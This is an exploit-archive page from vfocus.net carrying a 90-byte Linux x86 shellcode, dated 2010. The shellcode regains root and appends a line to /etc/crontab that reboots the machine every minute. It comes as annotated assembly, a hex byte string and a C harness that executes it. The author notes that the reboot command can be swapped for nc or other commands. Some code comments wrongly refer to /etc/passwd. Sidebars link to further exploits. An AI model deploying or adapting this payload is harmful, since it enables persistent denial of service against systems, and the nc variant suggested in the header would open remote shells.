首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 linux/x86 setreuid(0,0) and add reboot command each minutes in /etc/crontab 90 b 来源：vfocus.net 作者：xertux 发布时间：2010-09-28   #include <stdio.h> /*   * Title : linux x86 shellcode setreuid(0, 0) and add reboot command each minutes in /etc/crontab, 90 bytes   * Author : xertux   * Platform: Linux X86   * Description : setuid(0) + open(/etc/crontab, e0x441, 0x180) + write(fd, * * * * * root reboot\n, 22) + close(fd)   * Add a line at /etc/crontab => * * * * * root reboot   * Reboot the computer each minutes => An user hasn't the time to modify the /etc/crontab file   * Dos Shellcode but we can replace reboot command by nc command or many other command...   * Size : 90 bytes   * */ /* BITS 32 ;setresuid(0,0,0) xor eax, eax         ; eax become 0 xor ebx, ebx         ; ebx become 0 xor ecx, ecx         ; ecx become 0 cdq                  ; edx become 0 mov al, 0xa4         ; put call system 164 into eax int 0x80             ; execute setresuid(0,0,0) ;open(/etc/crontab, e0x441, 0x180)) push edx             ; null string termination push 0x6261746e      ; push "ntab" push 0x6f72632f      ; push "/cro" push 0x6374652f      ; push "/etc" mov ebx, esp         ; put "/etc//passwd" into ebx mov WORD cx, 0x441   ; put the O_WRONLY | O_APPEND | O_CREATE argument mov WORD dx, 0x180   ; put the S_IRUSR | S_IWUSR argument push BYTE 0x5        ; put call system open on the stack pop eax              ; get the system call number and insert into eax int 0x80             ; execute open(/etc//passwd, O_WRONLY | O_APPEND, S_IRUSR | S_IWUSR) ;write(fd, "* * * * * root reboot\n", 22) ==> pass "toor" mov ebx, eax         ; put the file descriptor return by open into ebx xor eax, eax         ; eax become 0 push eax             ; null termination string push WORD 0x0a74     ; push "t\n" push 0x6f6f6265      ; push "eboo" push 0x7220746f      ; push "ot r" push 0x6f72202a      ; push "* ro" push 0x202a202a      ; push "* * " push 0x202a202a      ; push "* * " mov ecx, esp         ; put "* * * * * root reboot\n" into ebx push BYTE 22         ; put the size of line written on the stack pop edx              ; get the size into edx mov al, 0x4          ; put the call system write into eax int 0x80             ; execute write(fd, * * * * * root reboot\n", 22) ;close(fd) push BYTE 0x6        ; put the call system close on the stack pop eax              ; put the call system number into eax int 0x80             ; execute close(fd) */ char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x52\x68\x6e\x74\x61" "\x62\x68\x2f\x63\x72\x6f\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x41" "\x04\x66\xba\x80\x01\x6a\x05\x58\xcd\x80\x89\xc3\x31\xc0\x50\x66" "\x68\x74\x0a\x68\x65\x62\x6f\x6f\x68\x6f\x74\x20\x72\x68\x2a\x20" "\x72\x6f\x68\x2a\x20\x2a\x20\x68\x2a\x20\x2a\x20\x89\xe1\x6a\x16" "\x5a\xb0\x04\xcd\x80\x6a\x06\x58\xcd\x80"; int main() { printf("[*] Shellcode - length: %d\n", strlen(shellcode)); (*(void(*)())shellcode)(); return 0; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·linux/x86 setreuid(0) and add ·Acunetix Ltd 2010 Version 6.5 ·Yahoo! Messenger 10 (PhotoShar ·winstyler (winstyler.exe) DLL ·Realtek (InstallShield-RTCOMDL ·Fichier Identificateur numriqu ·PDF Creator Pilot (PDFCreatorP ·VLC 1.0.5 Golden eye DLL Hijac ·BS.Player 2.56 (Build 1043) .m ·Opera 10.51 DLL Hijacking Expl ·Gokhun ASP Stok v1.0 Multiple ·KMplayer v 2.9.3.1428 DLL Hija   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved